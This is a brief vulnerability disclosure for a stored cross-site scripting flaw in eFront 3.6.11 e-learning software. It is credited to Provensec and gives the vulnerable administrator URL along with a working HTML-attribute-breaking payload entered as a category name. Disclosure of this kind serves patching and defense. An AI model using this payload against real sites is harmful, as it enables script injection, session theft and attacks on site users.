# Affected software: efrontlearning
# Type of vulnerability: stored xss
# URL: http://demo.efrontlearning.net/
# Discovered by: Provensec
# Website: http://www.provensec.com
# Description: Open Source e-Learning
# Proof of concept
#version:eFront 3.6.11
goto addd new category
http://demo.efrontlearning.net/enterprise/www/administrator.php?ctg=directions
and add new with xss payload "><img src=d onerror=confirm(1);> and
save it payload will execute
#screen:http://prntscr.com/69zhge